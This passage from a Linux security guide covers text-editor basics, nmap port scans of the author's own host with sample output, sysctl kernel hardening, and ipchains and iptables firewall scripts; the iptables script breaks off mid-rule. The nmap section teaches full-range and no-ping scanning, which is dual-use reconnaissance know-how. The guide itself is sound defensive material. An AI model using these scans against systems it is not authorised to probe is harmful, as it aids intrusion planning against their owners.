By Bill Staehle
All the world is a file.
There are a great many types of files, but I'm going to stretch it here, and
class them into two really broad families:
  Text files are just that.
  Binary files are not.
Binary files are meant to be read by machines; text files can be easily
edited, and are generally read by people. But text files can be (and
frequently are) read by machines. Examples of this would be configuration
files, and scripts.
There are a number of different text editors available in *nix. A few are
found on every system. That would be '/bin/ed' and '/bin/vi'. 'vi' is almost
always a clone such as 'vim' due to license problems. The problem with 'vi'
and 'ed' is that they are terribly user unfriendly. Another common editor
that is not always installed by default is 'emacs'. It has a lot more
features and capabilities, but it is not easy to learn either.
As to 'user friendly' editors, 'mcedit' and 'pico' are good choices to start
with. These are often much easier for those new to *nix.
The first things to learn are how to exit an editing session, how to save
changes to the file, and then how to avoid breaking long lines that should
not be broken (wrapped).
The 'vi' editor
'vi' is one of the most common text editors in the Unix world, and it's
nearly always found on any *nix system. Actually, due to license problems,
the '/bin/vi' on a Linux system is always a 'clone', such as 'elvis', 'nvi',
or 'vim' (there are others). These clones can act exactly like the original
'vi', but usually have additional features that make it slightly less
impossible to use.
So, if it's so terrible, why learn about it? Two reasons. First, as noted,
it's almost guaranteed to be installed, and other (more user friendly)
editors may not be installed by default. Second, many of the 'commands' work
in other applications (such as the pager 'less' which is also used to view
man pages). In 'less', accidentally pressing the 'v' key starts 'vi' in most
installations.
'vi' has two modes. The first is 'command' mode, where keystrokes are
interpreted as commands. The other is 'insert' mode, where nearly all
keystrokes are interpreted as text to be inserted.
==> Emergency exit from 'vi'
1. Press the <esc> key up to three times, until the computer beeps, or the
screen flashes.
2. Press the keys :q! <Enter>
That is: colon, the letter q, and then the exclamation point, followed by the
Enter key.
'vi' commands are as follows. All of these are in 'command' mode:
a        Enter insertion mode after the cursor.
A        Enter insertion mode at the end of the current line.
i        Enter insertion mode before the cursor.
o        Enter insertion mode, opening a new line BELOW the current line.
O        Enter insertion mode, opening a new line ABOVE the current line.
h        Move cursor left one character.
l        Move cursor right one character.
j        Move cursor down one line.
k        Move cursor up one line.
/mumble  Move cursor forward to the next occurrence of 'mumble' in the text.
?mumble  Move cursor backward to the next occurrence of 'mumble' in the text.
n        Repeat the last search (? or / without 'mumble' will do the same
         thing).
u        Undo the last change made.
^B       Scroll back one window.
^F       Scroll forward one window.
^U       Scroll up one half window.
^D       Scroll down one half window.
:w       Write to file.
:wq      Write to file, and quit.
:q       Quit.
:q!      Quit without saving.
<esc>    Leave insertion mode.
NOTE: The four 'arrow' keys almost always work in 'command' or 'insert' mode.
The 'ed' editor.
The 'ed' editor is a line editor. Other than the fact that it is virtually
guaranteed to be on any *nix computer, it has no socially redeeming features,
although some applications may need it. A _lot_ of things have been offered
to replace this 'thing' from 1975.
==> Emergency exit from 'ed'
1. Type a period on a line by itself, and press <Enter>. This gets you to
command mode, or prints a line of text if you were already in command mode.
2. Type q and press <Enter>. If there were no changes to the file, this
action quits ed. If you then see a '?', the file has changed, and 'ed' is
asking if you want to save the changes. Press q and <Enter> a second time to
confirm that you want out.
The 'pico' editor.
'pico' is a part of the Pine mail/news package from the University of
Washington (state, USA). It is a very friendly editor, with one minor
failing. It silently inserts a line feed character and wraps the line when it
exceeds (generally) 74 characters. While this is fine while creating mail,
news articles, and text notes, it is often fatal when editing system files.
The solution to this problem is simple. Call the program with the -w option,
like this:
pico -w file_2_edit
Pico is so user friendly, no further instructions are needed. It _should_ be
obvious (look at the bottom of the screen for commands). There is an
extensive help function. Pico is available with nearly all distributions,
although it _may_ not be installed by default.
==> Emergency exit from 'pico'
Press and hold the <Ctrl> key, and press the letter x. If no changes have
been made to the file, this will quit pico. If changes have been made, it
will ask if you want to save the changes. Pressing n will then exit.
The 'mcedit' editor.
'mcedit' is part of the Midnight Commander shell program, a full featured
visual shell for Unix-like systems. It can be accessed directly from the
command line ( mcedit file_2_edit ) or as part of 'mc' (use the arrow keys to
highlight the file to be edited, then press the F4 key).
mcedit is probably the most intuitive editor available, and comes with
extensive help. "commands" are accessed through the F* keys. Midnight
Commander is available with nearly all distributions, although it _may_ not
be installed by default.
==> Emergency exit from 'mcedit'
Press the F10 key. If no changes have been made to the file, this will quit
mcedit. If changes have been made, it will ask if you want to Cancel this
action. Pressing n will then exit.
-----------------------------------------------------------------------------
8.7. nmap
Let's look at a few quick examples of what nmap scans look like. The intent
here is to show how to use nmap to verify our firewalling, and system
integrity. nmap has other uses that we don't need to get into. Do NOT use
nmap on systems other than your own, unless you have permission from the
owner, and you know it is not a violation of anyone's Terms of Service. This
kind of thing will be taken as hostile by most people.
As mentioned previously, nmap is a sophisticated port scanning tool. It tries
to see if a host is "there", which ports might be open, and, beyond that,
what states those ports might be in. nmap has a complex command line and can
do many types of "scans". See the man page for all the nitty gritty.
A couple of words of warning first. If using portsentry, turn it off. It will
drop the route to wherever the scan is coming from. You might want to turn
off any logging also, or at least be aware that you might get copious logs if
doing multiple scans.
A simple, default scan of "localhost":
+---------------------------------------------------------------------------+
| # nmap localhost |
| |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) |
| Interesting ports on bigcat (127.0.0.1): |
| (The 1507 ports scanned but not shown below are in state: closed) |
| |
| Port State Service |
| 22/tcp open ssh |
| 25/tcp open smtp |
| 37/tcp open time |
| 53/tcp open domain |
| 80/tcp open http |
| 3000/tcp open ppp |
| |
| Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds |
| |
| |
+---------------------------------------------------------------------------+
If you've read most of this document, you should be familiar with these
services by now. These are some of the same ports we've seen in other
examples. Some things to note on this scan: it only did 1500+ "interesting"
ports -- not all ports. This can be configured differently if more is
desirable (see the man page). It only did TCP ports too. Again, configurable.
It only picks up "listening" services, unlike netstat, which shows all open
ports -- listening or otherwise. Note that the last "open" port here, 3000,
is identified as "ppp". Wrong! That is just an educated guess by nmap based on
what is contained in /etc/services for this port number. Actually in this
case it is ntop (a network traffic monitor). Take the service names with a
grain of salt. There is no way for nmap to really know what is on that port.
Matching port numbers with service names can at times be risky. Many do have
standard ports, but there is nothing to say they have to use the commonly
associated port numbers.
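To see where a guess like "ppp" comes from, you can do the same lookup nmap
does by hand: /etc/services just maps "port/protocol" pairs to names. The
sketch below runs the lookup against a canned line in the usual /etc/services
format, rather than the real file, so it behaves the same on any system (the
sample line is an assumption for illustration, not taken from your system):

```shell
#!/bin/sh
# Reproduce nmap's service-name guess. /etc/services maps a
# "port/protocol" pair to a name, with no knowledge of what is
# actually listening on that port. We use a canned line here
# instead of reading the real /etc/services.
line="ppp             3000/tcp                # User Space PPP"
# The service name is the first whitespace-separated field.
service=`echo "$line" | awk '{print $1}'`
echo "nmap would report port 3000/tcp as: $service"
```

That name is printed no matter what daemon really owns the port -- which is
exactly why it said "ppp" when ntop was listening.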
Notice that in all our netstat examples, we had two classes of open ports:
listening servers, and then established connections that we initiated to
other remote hosts (e.g. a web server somewhere). nmap only sees the first
group -- the listening servers! The other ports connecting us to remote
servers are not visible, and thus not vulnerable. These ports are "private"
to that single connection, and will be closed when the connection is
terminated.
So we have open and closed ports here. Simple enough, and gives a pretty good
idea what is running on bigcat -- but not necessarily what we look like to
the outside world since this was done from localhost, and wouldn't reflect
any firewalling or other access control mechanisms.
Let's do a little more intensive scan. Let's check all ports -- TCP and UDP.
+---------------------------------------------------------------------------+
| # nmap -sT -sU -p 1-65535 localhost |
| |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) |
| Interesting ports on bigcat (127.0.0.1): |
| (The 131050 ports scanned but not shown below are in state: closed) |
| |
| Port State Service |
| 22/tcp open ssh |
| 25/tcp open smtp |
| 37/tcp open time |
| 53/tcp open domain |
| 53/udp open domain |
| 80/tcp open http |
| 3000/tcp open ppp |
| 8000/tcp open unknown |
| 32768/udp open unknown |
| |
| Nmap run completed -- 1 IP address (1 host up) scanned in 385 seconds |
| |
| |
+---------------------------------------------------------------------------+
This is more than just "interesting" ports -- it is everything. We picked up
a couple of new ones in the process too. We've seen these before with netstat
, so we know what they are. That is the Junkbuster web proxy on port 8000/tcp
and named on 32768/udp. This scan takes much, much longer, but it is the only
way to see all ports.
So now we have a pretty good idea of what is open on bigcat. Since we are
scanning localhost from localhost, everything should be visible. We still
don't know how the outside world sees us though. Now I'll ssh to another host
on the same LAN, and try again.
+---------------------------------------------------------------------------+
| # nmap bigcat |
| |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) |
| Interesting ports on bigcat (192.168.1.1): |
| (The 1520 ports scanned but not shown below are in state: closed) |
| |
| Port State Service |
| 22/tcp open ssh |
| 3000/tcp open ppp |
| |
| Nmap run completed -- 1 IP address (1 host up) scanned in 1 second |
| |
| |
+---------------------------------------------------------------------------+
I confess to tampering with the iptables rules here to make a point. Only two
visible ports on this scan. Everything else is "closed". So says nmap. Once
again:
+----------------------------------------------------------------------------------+
| # nmap bigcat |
| |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) |
| Note: Host seems down. If it is really up, but blocking our ping probes, try -P0 |
| |
| Nmap run completed -- 1 IP address (0 hosts up) scanned in 30 seconds |
| |
| |
+----------------------------------------------------------------------------------+
Oops, I blocked ICMP (ping) while I was at it this time. One more time:
+---------------------------------------------------------------------------+
| # nmap -P0 bigcat |
| |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) |
| All 1523 scanned ports on bigcat (192.168.1.1) are: filtered |
| |
| Nmap run completed -- 1 IP address (1 host up) scanned in 1643 seconds |
| |
| |
+---------------------------------------------------------------------------+
That's it. Notice how long that took. Notice ports are now "filtered" instead
of "closed". How does nmap know that? Well for one, "closed" means bigcat
sent a packet back saying "nothing running here", i.e. port is closed. In
this last example, the iptables rules were changed to not allow ICMP (ping),
and to "DROP" all incoming packets. In other words, no response at all. A
subtle difference since nmap seems to still know there was a host there, even
though no response was given. One lesson here is that if you want to slow a
scanner down, "DROP" (or "DENY") the packets. This forces a TCP timeout for
the remote end on each port probe. Anyway, if your scans look like this, that
is probably as well as can be expected, and your firewall is doing its job.
A brief note on UDP: nmap can not accurately determine the status of these
ports if they are "filtered". You probably will get a false-positive "open"
condition. This has to do with UDP being a connectionless protocol. If nmap
gets no answer (e.g. due to a "DROP"), it assumes the packets reached the
target, and thus the port will be reported as "open". This is "normal" for
nmap.
We can play with firewall rules in a LAN set up to try to simulate how the
outside world sees us, and if we are smart, and know what we are doing, and
don't have a brain fart, we probably will have a pretty good picture. But it
is still best to try to find a way to do it from outside if possible. Again,
make sure you are not violating any ISP rules of conduct. Do you have a
friend on the same ISP?
-----------------------------------------------------------------------------
8.8. Sysctl Options
The "sysctl" options are kernel parameters that can be configured via the /
proc filesystem. These can be dynamically adjusted at run-time. Typically
these options are off if set to "0", and on if set to "1".
Some of these have security implications, and that is why we are here ;-)
We'll just list the ones we think are relevant. Feel free to cut and paste
these into a firewall script, or other file that is run during boot (like /
etc/rc.local). Red Hat provides the sysctl command for dynamically adjusting
these values (see man page). Or they can permanently be set in /etc/
sysctl.conf with your text editor of choice. sysctl is executed during init,
and uses these values. You can read up on what these mean in /usr/src/linux/
Documentation/sysctl/README and other files in the kernel Documentation
directories.
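The two methods shown below are interchangeable: a sysctl.conf key name is
simply the setting's path under /proc/sys with the slashes turned into dots.
A quick sketch of that mapping:

```shell
#!/bin/sh
# Convert a /proc/sys path into the equivalent sysctl.conf key name.
# Echoing "1" into /proc/sys/net/ipv4/conf/all/rp_filter changes the
# same setting as "net.ipv4.conf.all.rp_filter = 1" in /etc/sysctl.conf.
path="net/ipv4/conf/all/rp_filter"
key=`echo $path | tr / .`
echo "$key"
```

So anything you can set with an "echo" into /proc/sys, you can also make
permanent in /etc/sysctl.conf, and vice versa.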
The traditional method:
#!/bin/sh
#
# Configure kernel sysctl run-time options.
#
###################################################################
# Anti-spoofing blocks
for i in /proc/sys/net/ipv4/conf/*/rp_filter;
do
echo 1 > $i
done
# Ensure source routing is OFF
for i in /proc/sys/net/ipv4/conf/*/accept_source_route;
do
echo 0 > $i
done
# Ensure TCP SYN cookies protection is enabled
[ -e /proc/sys/net/ipv4/tcp_syncookies ] &&\
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
# Ensure ICMP redirects are disabled
for i in /proc/sys/net/ipv4/conf/*/accept_redirects;
do
echo 0 > $i
done
# Ensure oddball addresses are logged
[ -e /proc/sys/net/ipv4/conf/all/log_martians ] &&\
echo 1 > /proc/sys/net/ipv4/conf/all/log_martians
[ -e /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts ] &&\
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
[ -e /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses ] &&\
echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
## Optional from here on down, depending on your situation. ############
# Ensure ip-forwarding is enabled if
# we want to do forwarding or masquerading.
[ -e /proc/sys/net/ipv4/ip_forward ] &&\
echo 1 > /proc/sys/net/ipv4/ip_forward
# On if your IP is dynamic (or you don't know).
[ -e /proc/sys/net/ipv4/ip_dynaddr ] &&\
echo 1 > /proc/sys/net/ipv4/ip_dynaddr
# eof
The same effect by using /etc/sysctl.conf instead:
#
# Add to existing sysctl.conf
#
# Anti-spoofing blocks
net.ipv4.conf.default.rp_filter = 1
net.ipv4.conf.all.rp_filter = 1
# Ensure source routing is OFF
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.all.accept_source_route = 0
# Ensure TCP SYN cookies protection is enabled
net.ipv4.tcp_syncookies = 1
# Ensure ICMP redirects are disabled
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.accept_redirects = 0
# Ensure oddball addresses are logged
net.ipv4.conf.default.log_martians = 1
net.ipv4.conf.all.log_martians = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
## Optional from here on down, depending on your situation. ############
# Ensure ip-forwarding is enabled if
# we want to do forwarding or masquerading.
net.ipv4.ip_forward = 1
# On if your IP is dynamic (or you don't know).
net.ipv4.ip_dynaddr = 1
# end of example
-----------------------------------------------------------------------------
8.9. Secure Alternatives
This section will give a brief run down of secure alternatives to potentially
insecure methods. This will be a hodgepodge of clients and servers.
  * telnet, rsh - ssh
  * ftp, rcp - scp or sftp. Both are part of ssh packages. Also, files can
easily be transferred via HTTP if Apache is already running anyway. Apache
can be buttoned down even more by using SSL (HTTPS).
  * sendmail - postfix, qmail. Not to imply that current versions of sendmail
are insecure. There is just some bad history there, and it is so widely used
that it makes an inviting crack target.
As noted above, Linux installations often include a fully functional mail
server. While this may have some advantages, it is not necessary in many
cases for simply sending mail, or retrieving mail. This can all be done
without a "mail server daemon" running locally.
  * POP3 - SPOP3, POP3 over SSL. If you really need to run your own POP
server, this is the way to do it. If retrieving your mail from your ISP's
server, then you are at their mercy as to what they provide.
  * IMAP - IMAPS, same as above.
  * If you find you need a particular service, and it is for just you or a
few friends, consider running it on a non-standard port. Most server daemons
support this, and it is not a problem as long as those who will be
connecting know about it. For instance, the standard port for sshd is 22.
Any worm or scan will probe for this port number. So run it on a randomly
chosen port instead. See the sshd man page.
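As a sketch of the sshd case (the port number 2222 below is an arbitrary
choice for illustration, not a recommendation), moving sshd off port 22 is a
one-line change in /etc/ssh/sshd_config:

```
# /etc/ssh/sshd_config (excerpt)
# Listen on an arbitrary non-standard port instead of the well-known 22.
Port 2222
```

Restart sshd after the change, and have your users connect with 'ssh -p 2222
host'. The same effect is available at run time with '/usr/sbin/sshd -p 2222'
(see the sshd and sshd_config man pages for both).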
-----------------------------------------------------------------------------
8.10. Ipchains and Iptables Redux
This section offers a little more advanced look at some of the things that
ipchains and iptables can do. These are basically the same scripts as in Step
3 above, just with some more advanced configuration options added. These will
provide "masquerading", "port forwarding", allow access to some user
definable services, and a few other things. Read the comments for
explanations.
-----------------------------------------------------------------------------
8.10.1. ipchains II
#!/bin/sh
#
# ipchains.sh
#
# An example of a simple ipchains configuration. This script
# can enable 'masquerading' and will open user definable ports.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
# Set the location of ipchains (default).
IPCHAINS=/sbin/ipchains
# Local Interfaces
#
# This is the WAN interface, that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#
# Local Area Network (LAN) interface.
#LAN_IFACE="eth0"
LAN_IFACE="eth1"
# Our private LAN address(es), for masquerading.
LAN_NET="192.168.1.0/24"
# For static IP, set it here!
#WAN_IP="1.2.3.4"
# Set a list of public server port numbers here...not too many!
# These will be open to the world, so use caution. The example is
# sshd, and HTTP (www). Any services included here should be the
# latest version available from your vendor. Comment out to disable
# all PUBLIC services.
#PUBLIC_PORTS="22 80 443"
PUBLIC_PORTS="22"
# If we want to do port forwarding, this is the host
# that will be forwarded to.
#FORWARD_HOST="192.168.1.3"
# A list of ports that are to be forwarded.
#FORWARD_PORTS="25 80"
# If you get your public IP address via DHCP, set this.
DHCP_SERVER=66.21.184.66
# If you need identd for a mail server, set this.
MAIL_SERVER=
# A list of unwelcome hosts or nets. These will be denied access
# to everything, even our 'PUBLIC' services. Provide your own list.
#BLACKLIST="11.22.33.44 55.66.77.88"
# A list of "trusted" hosts and/or nets. These will have access to
# ALL protocols, and ALL open ports. Be selective here.
#TRUSTED="1.2.3.4/8 5.6.7.8"
## end user configuration options #################################
###################################################################
# The high ports used mostly for connections we initiate and return
# traffic.
LOCAL_PORTS=`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f1`:\
`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f2`
# Any and all addresses from anywhere.
ANYWHERE="0/0"
# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPCHAINS -F
# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that ipchains uses.
$IPCHAINS -P forward DENY
$IPCHAINS -P output ACCEPT
$IPCHAINS -P input DENY
# Accept localhost/loopback traffic.
$IPCHAINS -A input -i lo -j ACCEPT
# Get our dynamic IP now from the Inet interface. WAN_IP will be our
# IP address we are protecting from the outside world. Put this
# here, so default policy gets set, even if interface is not up
# yet.
[ -z "$WAN_IP" ] &&\
WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \ -f 1`
# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1
WAN_MASK=`ifconfig $WAN_IFACE | grep Mask | cut -d : -f 4`
WAN_NET="$WAN_IP/$WAN_MASK"
## Reserved IPs:
#
# We should never see these private addresses coming in from outside
# to our external interface.
$IPCHAINS -A input -l -i $WAN_IFACE -s 10.0.0.0/8 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 172.16.0.0/12 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 192.168.0.0/16 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 127.0.0.0/8 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 169.254.0.0/16 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 224.0.0.0/4 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 240.0.0.0/5 -j DENY
# Bogus routing
$IPCHAINS -A input -l -s 255.255.255.255 -d $ANYWHERE -j DENY
## LAN access and masquerading
#
# Allow connections from our own LAN's private IP addresses via the LAN
# interface and set up forwarding for masqueraders if we have a LAN_NET
# defined above.
if [ -n "$LAN_NET" ]; then
echo 1 > /proc/sys/net/ipv4/ip_forward
$IPCHAINS -A input -i $LAN_IFACE -j ACCEPT
$IPCHAINS -A forward -s $LAN_NET -d $LAN_NET -j ACCEPT
$IPCHAINS -A forward -s $LAN_NET -d ! $LAN_NET -j MASQ
fi
## Blacklist hosts/nets
#
# Get the blacklisted hosts/nets out of the way, before we start opening
# up any services. These will have no access to us at all, and will be
# logged.
for i in $BLACKLIST; do
$IPCHAINS -A input -l -s $i -j DENY
done
## Trusted hosts/nets
#
# This is our trusted host list. These have access to everything.
for i in $TRUSTED; do
$IPCHAINS -A input -s $i -j ACCEPT
done
# Port Forwarding
#
# Which ports get forwarded to which host. This is one to one
# port mapping (ie 80 -> 80) in this case.
# NOTE: ipmasqadm is a separate package from ipchains and needs
# to be installed also. Check first!
[ -n "$FORWARD_HOST" ] && ipmasqadm portfw -f &&\
for i in $FORWARD_PORTS; do
ipmasqadm portfw -a -P tcp -L $WAN_IP $i -R $FORWARD_HOST $i
done
## Open, but Restricted Access ports/services
#
# Allow DHCP server (their port 67) to client (to our port 68) UDP traffic
# from outside source.
[ -n "$DHCP_SERVER" ] &&\
$IPCHAINS -A input -p udp -s $DHCP_SERVER 67 -d $ANYWHERE 68 -j ACCEPT
# Allow 'identd' (to our TCP port 113) from mail server only.
[ -n "$MAIL_SERVER" ] &&\
$IPCHAINS -A input -p tcp -s $MAIL_SERVER -d $WAN_IP 113 -j ACCEPT
# Open up PUBLIC server ports here (available to the world):
for i in $PUBLIC_PORTS; do
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $i -j ACCEPT
done
# So I can check my home POP3 mailbox from work. Also, so I can ssh
# in to home system. Only allow connections from my workplace's
# various IPs. Everything else is blocked.
$IPCHAINS -A input -p tcp -s 255.10.9.8/29 -d $WAN_IP 110 -j ACCEPT
# Uncomment to allow ftp data back (active ftp). Not required for 'passive'
# ftp connections.
#$IPCHAINS -A input -p tcp -s $ANYWHERE 20 -d $WAN_IP $LOCAL_PORTS -y -j ACCEPT
# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are
# the high, unprivileged ports (1024 to 4999 by default). This will
# allow return connection traffic for connections that we initiate
# to outside sources. TCP connections are opened with 'SYN' packets.
# We have already opened those services that need to accept SYNs
# for, so other SYNs are excluded here for everything else.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT
# We can't be so selective with UDP since that protocol does not know
# about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT
# Allow access to the masquerading ports conditionally. Masquerading
# uses its own port range -- on 2.2 kernels ONLY! 2.4 kernels do not
# use these ports, so comment out!
[ -n "$LAN_NET" ] &&\
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP 61000: ! -y -j ACCEPT &&\
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP 61000: -j ACCEPT
## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPCHAINS -A input -p icmp --icmp-type echo-reply \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input -p icmp --icmp-type destination-unreachable \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input -p icmp --icmp-type time-exceeded \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
#######################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-l'.
# Outgoing traffic is allowed as the default policy for the 'output'
# chain. There are no restrictions on that.
$IPCHAINS -A input -l -j DENY
echo "Ipchains firewall is up `date`."
##-- eof ipchains.sh
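Two lines in the script above are dense enough to deserve a closer look: the
LOCAL_PORTS construction and the WAN_IP extraction. The sketch below replays
both against canned sample data (a fake ip_local_port_range value and a fake
line of ifconfig output -- both assumed values for illustration), so it can
be run safely on any system without touching the network:

```shell
#!/bin/sh
# LOCAL_PORTS: /proc/sys/net/ipv4/ip_local_port_range holds two
# tab-separated numbers (low and high port). The script joins them
# with ':' to form an ipchains port range. We fake the file's
# contents here instead of reading /proc.
range=`printf '1024\t4999'`
LOCAL_PORTS=`echo "$range" | cut -f1`:`echo "$range" | cut -f2`
echo "LOCAL_PORTS=$LOCAL_PORTS"

# WAN_IP: the script greps the 'inet' line out of ifconfig's output,
# takes the second colon-delimited field ("1.2.3.4  Bcast"), then the
# first space-delimited word of that. Again, a canned sample line
# stands in for the real ifconfig call.
sample="          inet addr:192.168.1.1  Bcast:192.168.1.255  Mask:255.255.255.0"
WAN_IP=`echo "$sample" | grep inet | cut -d : -f 2 | cut -d ' ' -f 1`
echo "WAN_IP=$WAN_IP"
```

With the sample data above, this prints LOCAL_PORTS=1024:4999 and
WAN_IP=192.168.1.1, which is exactly what the firewall script builds from
the live system.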
-----------------------------------------------------------------------------
8.10.2. iptables II
#!/bin/sh
#
# iptables.sh
#
# An example of a simple iptables configuration. This script
# can enable 'masquerading' and will open user definable ports.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
# Set the location of iptables (default).
IPTABLES=/sbin/iptables
# Local Interfaces
# This is the WAN interface that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#
# Local Area Network (LAN) interface.
#LAN_IFACE="eth0"
LAN_IFACE="eth1"
# Our private LAN address(es), for masquerading.
LAN_NET="192.168.1.0/24"
# For static IP, set it here!
#WAN_IP="1.2.3.4"
# Set a list of public server port numbers here...not too many!
# These will be open to the world, so use caution. The example is
# sshd, and HTTP (www). Any services included here should be the
# latest version available from your vendor. Comment out to disable
# all Public services. Do not put any ports to be forwarded here,
# this is for direct access only.
#PUBLIC_PORTS="22 80 443"
PUBLIC_PORTS="22"
# If we want to do port forwarding, this is the host
# that will be forwarded to.
#FORWARD_HOST="192.168.1.3"
# A list of ports that are to be forwarded.
#FORWARD_PORTS="25 80"
# If you get your public IP address via DHCP, set this.
DHCP_SERVER=66.21.184.66
# If you need identd for a mail server, set this.
MAIL_SERVER=
# A list of unwelcome hosts or nets. These will be denied access
# to everything, even our 'Public' services. Provide your own list.
#BLACKLIST="11.22.33.44 55.66.77.88"
# A list of "trusted" hosts and/or nets. These will have access to
# ALL protocols, and ALL open ports. Be selective here.
#TRUSTED="1.2.3.4/8 5.6.7.8"
## end user configuration options #################################
###################################################################
# Any and all addresses from anywhere.
ANYWHERE="0/0"
# These modules may need to be loaded:
modprobe ip_conntrack_ftp
modprobe ip_nat_ftp
# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPTABLES -F
$IPTABLES -X
# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that IPTABLES uses.
$IPTABLES -P FORWARD DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P INPUT DROP
# Accept localhost/loopback traffic.
$IPTABLES -A INPUT -i lo -j ACCEPT
# Get our dynamic IP now from the Inet interface. WAN_IP will be the
# address we are protecting from outside addresses.
[ -z "$WAN_IP" ] &&\
WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \ -f 1`
# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1
WAN_MASK=`ifconfig $WAN_IFACE |grep Mask |cut -d : -f 4`
WAN_NET="$WAN_IP/$WAN_MASK"
## Reserved IPs:
#
# We should never see these private addresses coming in from outside
# to our external interface.
$IPTABLES -A INPUT -i $WAN_IFACE -s 10.0.0.0/8 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 172.16.0.0/12 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 192.168.0.0/16 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 127.0.0.0/8 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 169.254.0.0/16 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 224.0.0.0/4 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 240.0.0.0/5 -j DROP
# Bogus routing
$IPTABLES -A INPUT -s 255.255.255.255 -d $ANYWHERE -j DROP
# Unclean
$IPTABLES -A INPUT -i $WAN_IFACE -m unclean -m limit \
--limit 15/minute -j LOG --log-prefix "Unclean: "
$IPTABLES -A INPUT -i $WAN_IFACE -m unclean -j DROP
## LAN access and masquerading
#
# Allow connections from our own LAN's private IP addresses via the LAN
# interface and set up forwarding for masqueraders if we have a LAN_NET
# defined above.
if [ -n "$LAN_NET" ]; then
echo 1 > /proc/sys/net/ipv4/ip_forward
$IPTABLES -A INPUT -i $LAN_IFACE -j ACCEPT
# $IPTABLES -A INPUT -i $LAN_IFACE -s $LAN_NET -d $LAN_NET -j ACCEPT
$IPTABLES -t nat -A POSTROUTING -s $LAN_NET -o $WAN_IFACE -j MASQUERADE
fi
## Blacklist
#
# Get the blacklisted hosts/nets out of the way, before we start opening
# up any services. These will have no access to us at all, and will
# be logged.
for i in $BLACKLIST; do
$IPTABLES -A INPUT -s $i -m limit --limit 5/minute \
-j LOG --log-prefix "Blacklisted: "
$IPTABLES -A INPUT -s $i -j DROP
done
## Trusted hosts/nets
#
# This is our trusted host list. These have access to everything.
for i in $TRUSTED; do
$IPTABLES -A INPUT -s $i -j ACCEPT
done
# Port Forwarding
#
# Which ports get forwarded to which host. This is one to one
# port mapping (ie 80 -> 80) in this case.
[ -n "$FORWARD_HOST" ] &&\
for i in $FORWARD_PORTS; do
$IPTABLES -A FORWARD -p tcp -s $ANYWHERE -d $FORWARD_HOST \
--dport $i -j ACCEPT
$IPTABLES -t nat -A PREROUTING -p tcp -d $WAN_IP --dport $i \
-j DNAT --to $FORWARD_HOST:$i
done
## Open, but Restricted Access ports
#
# Allow DHCP server (their port 67) to client (to our port 68) UDP
# traffic from outside source.
[ -n "$DHCP_SERVER" ] &&\
$IPTABLES -A INPUT -p udp -s $DHCP_SERVER --sport 67 \
-d $ANYWHERE --dport 68 -j ACCEPT
# Allow 'identd' (to our TCP port 113) from mail server only.
[ -n "$MAIL_SERVER" ] &&\
